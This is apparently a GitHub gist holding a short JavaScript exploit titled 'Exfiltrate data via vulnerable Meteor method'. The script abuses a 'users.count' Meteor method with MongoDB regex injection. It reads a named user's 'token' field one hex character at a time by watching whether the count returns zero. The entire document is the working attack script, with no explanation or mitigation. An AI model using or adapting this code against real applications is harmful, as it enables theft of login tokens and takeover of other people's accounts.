Exfiltrate data via vulnerable Meteor method
(function exploit(user, field, alphabet, data = '', index = 0) { | |
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => { | |
console.log('^' + data + alphabet[index] + '.*', res); | |
if (res == 0) { | |
index++; | |
} else { | |
data += alphabet[index]; | |
index = 0; | |
} | |
if (index >= alphabet.length) { | |
console.log("Done", data); | |
return; | |
} | |
setTimeout(() => { | |
exploit(user, field, alphabet, data, index); | |
}); | |
}); | |
})('kertojasoo', 'token', '0123456789abcdef'.split('')); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment